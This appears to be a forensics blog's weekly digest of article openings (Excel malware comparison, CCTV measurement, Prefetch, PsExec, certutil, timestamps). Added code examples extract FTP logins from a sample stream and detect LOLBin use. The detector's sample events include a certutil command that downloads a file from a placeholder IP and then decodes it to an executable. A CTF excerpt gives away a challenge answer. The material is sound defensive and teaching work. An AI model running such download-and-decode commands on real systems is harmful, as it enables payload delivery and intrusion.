Analysis Notes

A place to jot down notes from trying my hand at malware analysis and anything that seemed useful for analysis. This site uses Google Analytics.

4n6 Week 4 – 2023 - FORENSIC ANALYSIS

This entry was auto-generated and posted to show the opening of each article featured in This Week in 4n6 (FourAndSix = Forensics), so that the articles worth checking can be skimmed quickly. 4n6 itself can be found here.

FORENSIC ANALYSIS

Adam at Hexacorn

January 22, 2023, in Excel. One of the most common use cases we come across during our malware analysis exercises is a ROI-driven comparison of features between many samples of the same malware family. Yes, we can use BinDiff, Diaphora (and we should), but if it is a time-sensitive research, we need to take some shortcuts to deliver early results pronto. Here’s one way to do it. Note: I have used this approach many times in the past, because it’s simple, easy to understand, and produces a visual t...

Emi Polito at Amped

Being able to measure an object or a person (or an animal ?! ) in a two dimensional image is in high demand these days within the forensic video community. We all know (or should know!) that in Amped FIVE it is possible to calculate measurements such as the height of an unknown person or the speed of a vehicle from CCTV and other video evidence. And we have a variety of different filters in the Measurement group that can do the job just fine, such as Measure 1D, Measure 2D, Measure 3D and Speed ...

Cado Security

Craig Ball at ‘Ball in your Court’

Dany at Digitella

CyberDefenders PCAP Or It Didn't Happen Challenge Write Up
Hello everyone! In this post I will walk you through this challenge. You will need to make sure that you have Wireshark installed. It can be downloaded here: //www.wireshark.org/download.html
What is the FTP password?
To get the FTP password, I simply used the ftp filter. Then I scrolled down to a packet that had the term PASS in it. As you can see, the password is AfricaCTF2021.
What is the IPv6 address of the DNS server used by 1...
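The FTP step above works because FTP sends USER and PASS in cleartext on the control channel. The following is an added example (not code from the write-up) that parses an already reassembled control-channel conversation, as you would see it in Wireshark's "Follow TCP Stream", and pairs each PASS with the preceding USER and the server's verdict. The conversation, host and credentials are constructed; the tshark one-liner in the docstring is the equivalent on a real capture.

```python
"""Pull FTP logins out of a reassembled control-channel conversation.

Added example, not part of the write-up above: FTP carries USER and PASS in
cleartext, so the same packets the Wireshark `ftp` filter shows can be parsed
directly.  The conversation below is constructed; credentials are invented.
Equivalent one-liner on a real capture:
  tshark -r capture.pcap -Y 'ftp.request.command == "PASS"' -T fields -e ftp.request.arg
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: (direction, line) as seen after "Follow TCP Stream".
# "C" = client -> server, "S" = server -> client.
SAMPLE_STREAM: List[Tuple[str, str]] = [
    ("S", "220 (vsFTPd 3.0.3)"),
    ("C", "USER alice"),
    ("S", "331 Please specify the password."),
    ("C", "PASS wrongpass"),
    ("S", "530 Login incorrect."),
    ("C", "USER alice"),
    ("S", "331 Please specify the password."),
    ("C", "PASS S3cret-Example"),
    ("S", "230 Login successful."),
    ("C", "PWD"),
    ("S", '257 "/" is the current directory'),
]

REPLY_CODE = re.compile(r"^(\d{3})[ -]")


@dataclass
class FtpLogin:
    user: Optional[str]
    password: str
    succeeded: Optional[bool]  # None when the server's verdict was not captured


def extract_logins(stream: List[Tuple[str, str]]) -> List[FtpLogin]:
    """Pair each PASS command with the preceding USER and the server reply that follows."""
    logins: List[FtpLogin] = []
    current_user: Optional[str] = None
    awaiting_verdict: Optional[FtpLogin] = None
    for direction, line in stream:
        if direction == "C":
            command, _, argument = line.partition(" ")
            command = command.upper()
            if command == "USER":
                current_user = argument
            elif command == "PASS":
                awaiting_verdict = FtpLogin(current_user, argument, None)
                logins.append(awaiting_verdict)
        elif direction == "S" and awaiting_verdict is not None:
            match = REPLY_CODE.match(line)
            if not match:
                continue  # continuation line of a multi-line reply
            code = int(match.group(1))
            if 200 <= code < 300:       # 230 User logged in
                awaiting_verdict.succeeded = True
            elif code >= 400:           # 530 Not logged in
                awaiting_verdict.succeeded = False
            # 3xx (e.g. 332 Need account) leaves the verdict open
            awaiting_verdict = None
    return logins


def successful_credentials(stream) -> List[Tuple[Optional[str], str]]:
    """(user, password) pairs the server actually accepted."""
    return [(l.user, l.password) for l in extract_logins(stream) if l.succeeded]


if __name__ == "__main__":
    for login in extract_logins(SAMPLE_STREAM):
        print(login)
```

Keeping the failed attempt alongside the accepted one matters in a real investigation: a burst of 530 replies followed by a 230 is a brute-force that succeeded, which the password alone does not tell you.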

Domiziana Foti

LetsDefend-SOC163 — Suspicious Certutil.exe Usage
Certutil.exe is a command-line program provided by Microsoft that is used to dump and view certificate authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.
So why can this command be considered suspicious?
Precisely because it is not dangerous in nature and can be easily employed by threat actors to camouflage their malicious activity. LOLBins ...

Dr. Neal Krawetz at ‘The Hacker Factor Blog’

Fabian Mendoza at AboutDFIR

The Key to Identify PsExec. By Fabian Mendoza, January 18, 2023 (updated January 20, 2023).
Summary: In one way or another, PsExec – a wildly popular remote administration tool in the Microsoft Sysinternals Suite – peeks its head in the wild. Threat actors tend to leverage PsExec for various reasons, such as executing programs on a remote host in a victim’s environment, or for more nefarious reasons, such as deploying ransomware. The focus of this blog is to bring attention to a relatively new method of ide...
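Both the Certutil entry and the PsExec entry above come down to spotting a legitimate tool being used in a way it normally is not. The block below is an added example for both posts (not code from either author) that runs such checks over constructed event records using Sysmon and Windows event field names: certutil command lines that fetch from a URL or base64/hex-transcode a file, and the well-known default PsExec artefacts (the PSEXESVC service and named pipe, the EulaAccepted registry value, the client binary). Hostnames, IPs and SIDs are invented. It does not cover whatever "relatively new method" the PsExec post describes, and since PsExec -r renames the service, a renamed deployment needs other evidence.

```python
"""Triage event records for certutil LOLBin use and default PsExec artefacts.

Added example for the Certutil and PsExec posts above; not code from either
author.  Events are constructed dicts using Sysmon / Windows event field names;
hostnames, IPs and SIDs are invented.  The PsExec checks cover only the
well-known default artefacts (PSEXESVC service and pipe, EulaAccepted key);
PsExec -r renames the service, so a renamed deployment needs other evidence.
"""
import re

# Documented certutil switches that fetch from a URL or transcode a file.
CERTUTIL_FETCH = {"-urlcache", "-verifyctl"}
CERTUTIL_TRANSCODE = {"-decode", "-decodehex", "-encode", "-encodehex"}
URL_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)
PSEXEC_EULA_KEY = r"\sysinternals\psexec\eulaaccepted"


def suspicious_certutil(cmdline: str) -> list:
    """Reasons a certutil command line looks like LOLBin abuse; empty if benign."""
    tokens = cmdline.split()
    if not tokens:
        return []
    exe = tokens[0].strip('"').lower()
    if not (exe == "certutil" or exe.endswith("certutil.exe")):
        return []
    # certutil accepts both -flag and /flag; normalise to -flag
    flags = {"-" + t[1:].lower() for t in tokens[1:] if t[0] in "-/"}
    reasons = []
    if flags & CERTUTIL_FETCH and any(URL_RE.match(t) for t in tokens[1:]):
        reasons.append("downloads a file from a URL (%s)" % ", ".join(sorted(flags & CERTUTIL_FETCH)))
        if "-split" in flags or "-f" in flags:
            reasons.append("-split/-f writes the fetched content to disk")
    if flags & CERTUTIL_TRANSCODE:
        reasons.append("base64/hex decodes or encodes a file (%s)" % ", ".join(sorted(flags & CERTUTIL_TRANSCODE)))
    return reasons


def psexec_indicators(event: dict) -> list:
    """Default PsExec artefacts across service-install, pipe, registry and process events."""
    reasons = []
    eid = event.get("EventID")
    if eid == 7045:  # System log: a new service was installed
        name = event.get("ServiceName", "")
        path = event.get("ImagePath", "").strip('"').lower()
        if name.upper() == "PSEXESVC" or path.endswith("psexesvc.exe"):
            reasons.append("PSEXESVC service installed (PsExec default service name)")
    elif eid in (17, 18):  # Sysmon: named pipe created / connected
        pipe = event.get("PipeName", "")
        if pipe.upper().startswith("\\PSEXESVC"):
            reasons.append("PsExec named pipe %s" % pipe)
    elif eid == 13:  # Sysmon: registry value set
        if event.get("TargetObject", "").lower().endswith(PSEXEC_EULA_KEY):
            reasons.append("PsExec EulaAccepted written (first run for this user on this host)")
    elif eid in (1, 4688):  # Sysmon / Security: process creation
        image = event.get("Image", event.get("NewProcessName", "")).lower()
        if image.endswith(("\\psexec.exe", "\\psexec64.exe", "\\psexesvc.exe")):
            reasons.append("PsExec binary executed: %s" % image)
    return reasons


def triage(events: list) -> list:
    """(RecordId, [reasons]) for every event that tripped a check."""
    findings = []
    for ev in events:
        reasons = []
        if ev.get("EventID") in (1, 4688):
            reasons += suspicious_certutil(ev.get("CommandLine", ""))
        reasons += psexec_indicators(ev)
        if reasons:
            findings.append((ev["RecordId"], reasons))
    return findings


# Constructed sample events (not from a real system).
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/p.txt C:\Users\Public\p.txt"},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.exe"},
    {"RecordId": 3, "EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -store my"},  # benign: lists the personal certificate store
    {"RecordId": 4, "EventID": 7045, "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"RecordId": 5, "EventID": 17, "PipeName": r"\PSEXESVC-WS01-4242-stdin"},
    {"RecordId": 6, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001\Software\Sysinternals\PsExec\EulaAccepted"},
    {"RecordId": 7, "EventID": 7045, "ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for record_id, reasons in triage(SAMPLE_EVENTS):
        print(record_id, reasons)
```

The certutil check deliberately keys on switches plus a URL argument rather than on "certutil ran": the binary is used legitimately all the time, and the LOLBin pattern is the download-then-decode pair (records 1 and 2 above), which is why the two reasons are reported separately.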

Leonardo M. Falcon at Falcon Guard

Cognitive biases are systematic patterns of deviation from the norm or rationality in judgment, whereby inferences about other people and situations may be drawn in an illogical fashion. These biases are a result of the brain's attempt to simplify information processing. Cognitive biases can lead to perceptual distortion, inaccurate judgment, illogical interpretation, or what is broadly called irrationality. Cognitive biases can affect the decision-making process of individuals, as well as groups...

Forensafe

Application, 20/01/2023 Friday
uTorrent for Android is a mobile version of the popular uTorrent desktop application that allows users to download and share files on their Android devices. It is a P2P file-sharing program that utilizes the BitTorrent protocol to download files over the internet.
Digital Forensics Value of Android uTorrent Application
The forensic significance of uTorrent artifacts lies in its ability to supply investigators with valuable information in cases of illegal or copyright...

Kevin Pagano at Stark 4N6

Posted by Kevin Pagano, January 18, 2023. In my efforts to get more content up and more app parsers added to ALEAPP, I decided to take a look at Josh Hickman's Android 13 image. One app that I know Josh had looked at before (very extensively at that) was the Garmin Connect app. Garmin is probably one of the more well known brands from the Android side, along with FitBit, for tracking exercises. They have an extensive list of popular wearables an...

Lordx64

Multiple Linux Backdoors Discovered Targeting Bitcoin Core Developer — Technical Analysis
Context
First and foremost, I would like to express my gratitude to Luke, one of the Core Bitcoin developers, for sharing with me the information he uncovered on his compromised Linux server. Luke’s Linux server was targeted in an attack that was quite unfamiliar. This prompted me to reach out to Luke immediately after I heard the news. After investigating, Luke determined tha...

Manjesh Shetty

Uncovering Hidden Clues: How Windows Artifact Prefetch Can Help in Digital Forensics Investigations in Windows 11 Machine
January 15, 2023
Prefetch is a feature in Windows that helps the operating system quickly launch frequently used programs by preloading the necessary files into memory. This can speed up the start-up process and make the overall experience of using the computer more responsive. Prefetch is a feature in Windows operating systems that stores information about recently run program...
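As an added example for the Prefetch post above (not code from the author), the block below parses the fixed header of a .pf file following the publicly documented SCCA layout and checks that the on-disk file name agrees with the executable name and hash stored inside it, a mismatch being a sign the file was renamed or tampered with. Windows 10 and 11 store .pf files compressed with a "MAM\x04" header, so the parser refuses those and points to the usual decompression routes (RtlDecompressBufferEx with LZXPRESS Huffman on Windows, or libscca); the sample bytes are constructed, not taken from a real system.

```python
"""Parse the fixed header of a Windows Prefetch (.pf) file and check its name.

Added example for the post above; not code from the original.  Offsets follow
the publicly documented SCCA format.  The sample bytes are constructed here,
not taken from a real system.
"""
import struct

PF_SIGNATURE = b"SCCA"
MAM_SIGNATURE = b"MAM\x04"  # Windows 10/11 store .pf files LZXPRESS-Huffman compressed
VERSIONS = {
    17: "Windows XP/2003",
    23: "Windows Vista/7",
    26: "Windows 8.1",
    30: "Windows 10/11",
    31: "Windows 11 (newer builds)",
}
HEADER_LEN = 84


def is_compressed(data: bytes) -> bool:
    return data[:4] == MAM_SIGNATURE


def compressed_payload_size(data: bytes) -> int:
    """Uncompressed size recorded right after the MAM signature (little-endian uint32)."""
    if not is_compressed(data):
        raise ValueError("not an MAM-compressed prefetch file")
    return struct.unpack_from("<I", data, 4)[0]


def parse_header(data: bytes) -> dict:
    """Header of an *uncompressed* prefetch file.

    offset  size  field
    0       4     format version
    4       4     signature "SCCA"
    8       4     unknown
    12      4     file size
    16      60    executable name, UTF-16LE, NUL padded
    76      4     prefetch hash (the hex part of the file name)
    """
    if is_compressed(data):
        raise ValueError(
            "MAM-compressed: decompress first (RtlDecompressBufferEx with "
            "LZXPRESS Huffman on Windows, or libscca/pyscca)"
        )
    if len(data) < HEADER_LEN:
        raise ValueError("too short for a prefetch header")
    version, signature, _unknown, file_size = struct.unpack_from("<I4sII", data, 0)
    if signature != PF_SIGNATURE:
        raise ValueError("bad signature %r" % signature)
    executable = data[16:76].decode("utf-16-le").split("\x00", 1)[0]
    (pf_hash,) = struct.unpack_from("<I", data, 76)
    return {
        "version": version,
        "os": VERSIONS.get(version, "unknown"),
        "file_size": file_size,
        "executable": executable,
        "hash": pf_hash,
    }


def expected_filename(header: dict) -> str:
    """Name Windows gives the file: EXENAME-XXXXXXXX.pf with the hash in upper-case hex."""
    return "%s-%08X.pf" % (header["executable"], header["hash"])


def name_matches(filename: str, header: dict) -> bool:
    """True when the on-disk name agrees with the executable name and hash in the header."""
    return filename.upper() == expected_filename(header).upper()


def build_sample(exe="NOTEPAD.EXE", version=30, pf_hash=0x1A2B3C4D, total_size=0x2000) -> bytes:
    """Constructed header-only sample (not a real .pf file)."""
    name = exe.encode("utf-16-le").ljust(60, b"\x00")
    head = struct.pack("<I4sII", version, PF_SIGNATURE, 0x11, total_size) + name
    return (head + struct.pack("<I", pf_hash)).ljust(HEADER_LEN, b"\x00")


if __name__ == "__main__":
    header = parse_header(build_sample())
    print(header, expected_filename(header))
```

On a live Windows 10/11 system every file under C:\Windows\Prefetch will take the compressed branch, so in practice the decompression step comes first and this header parse runs on its output.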

Brad Duncan at Palo Alto Networks

By Brad Duncan, January 20, 2023 at 6:00 AM. Category: Tutorial. Tags: AgentTesla, Cloud-Delivered Security Services, Cortex XDR, next-generation firewall, OriginLogger, threat prevention, WildFire, Wireshark, Wireshark Tutorial
Executive Summary
Welcome to the January 2023 Unit 42 Wireshark quiz. This blog presents a packet capture (pcap) of malicious activity and asks questions based on information derived from...

RJM at Anchored Narratives

The Trojan did it defence is real!
A historical deep dive in planting digital evidence by nation-state actors to incriminate political opponents.
RJM, Feb 13, 2022
Cover: Activist Rona Wilson is brought to court June 7, 2018, in Pune, India. (Pratham Gokhale/Hindustan Times/Getty Images)
Disclaimer: The views, methods, and opinions exp...

The Trojan solved the Bhima Koregaon case!
How proper file, malware, and memory forensics techniques were able to catch the ModifiedElephant threat actor planting incriminating evidence on defendants' computers in India.
RJM, Jan 15
Disclaimer: The views, methods, and opinions expressed at Anchored Narratives are the author’s...

Paolo Dal Checco at Studio d’Informatica Forense

Published 21 January 2023 by Paolo Dal Checco. In forensic IT expert work, time is a decisive element that recurs in several contexts of technical analysis: timelines, supertimelines, metadata, expert reports on ordinary email or PEC (certified email), the creation, modification or access date of a file, the publication date of a post or a web page have become topics one reasons about almost daily. Further complications come from the various interpretations of computer time...
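One of the recurring "interpretations of computer time" the post refers to is that the same raw integer means a different instant depending on the epoch and unit it is read in, and that a local time written without its zone is ambiguous. The block below is an added example (not from the post) that converts between Windows FILETIME and Unix time, renders an instant in a fixed-offset zone, and shows which reading of a bare integer lands in a plausible range. All values are constructed; the +01:00 offset is a fixed stand-in for a machine's local zone and ignores daylight-saving rules.

```python
"""Convert between timestamp epochs and check which reading of a raw value is plausible.

Added example for the passage above (not from the original post).  Input values
are constructed; the zone offset is a fixed +01:00 used for illustration, so no
daylight-saving rules are applied.
"""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UNIX_EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# 100-ns ticks between 1601-01-01 and 1970-01-01.
FILETIME_UNIX_DELTA = 116444736000000000


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100-ns ticks since 1601-01-01 UTC) -> aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    """Aware datetime -> FILETIME.  Refuses naive values: decide UTC-or-local first."""
    if dt.tzinfo is None:
        raise ValueError("naive datetime: state whether it is UTC or local before converting")
    delta = dt.astimezone(timezone.utc) - FILETIME_EPOCH
    return (delta.days * 86400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def unix_to_datetime(ts: float) -> datetime:
    """Unix seconds -> aware UTC datetime."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def as_local(dt: datetime, offset_hours: float) -> datetime:
    """Render a UTC instant in a fixed-offset zone (stand-in for the examined machine's TZ)."""
    return dt.astimezone(timezone(timedelta(hours=offset_hours)))


def naive_local_to_utc(naive: datetime, offset_hours: float) -> datetime:
    """A wall-clock value read from an artefact, known to be in a given offset -> UTC."""
    return naive.replace(tzinfo=timezone(timedelta(hours=offset_hours))).astimezone(timezone.utc)


def interpretations(raw: int) -> dict:
    """The same integer read as Unix seconds, Unix milliseconds and FILETIME."""
    readings = {}
    for label, convert in (
        ("unix_seconds", unix_to_datetime),
        ("unix_milliseconds", lambda v: unix_to_datetime(v / 1000)),
        ("filetime", filetime_to_datetime),
    ):
        try:
            readings[label] = convert(raw)
        except (OverflowError, ValueError, OSError):
            readings[label] = None  # outside the representable range: that reading is impossible
    return readings


def plausible_readings(raw: int, earliest: int = 1995, latest: int = 2100) -> list:
    """Labels whose reading falls in a year range an investigator would accept."""
    return [
        label for label, dt in interpretations(raw).items()
        if dt is not None and earliest <= dt.year <= latest
    ]


if __name__ == "__main__":
    ft = 133187328000000000  # constructed FILETIME
    utc = filetime_to_datetime(ft)
    print(utc.isoformat(), as_local(utc, 1).isoformat())
    for raw in (1674259200, 1674259200000, ft):
        print(raw, plausible_readings(raw))
```

The plausibility check is a triage aid, not proof: a value that reads sensibly as milliseconds and nothing else is probably milliseconds, but the authoritative answer comes from the artefact's documented format, which is exactly why the post treats time as something to reason about rather than read off.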

System Weakness

What is LetsDefend?
LetsDefend is a Blue Team training platform that helps security learners gain experience by practicing their cyber investigation skills in a simulated SOC (Security Operations Center) environment. Its purpose is to assist current and future SOC analysts with their skills in investigating incidents and developing management reports.
Challenge Type: Malware analysis
Purpose: To analyze a malicious XLS file
Question 1: What is the date the file was created?
We begin by running the ...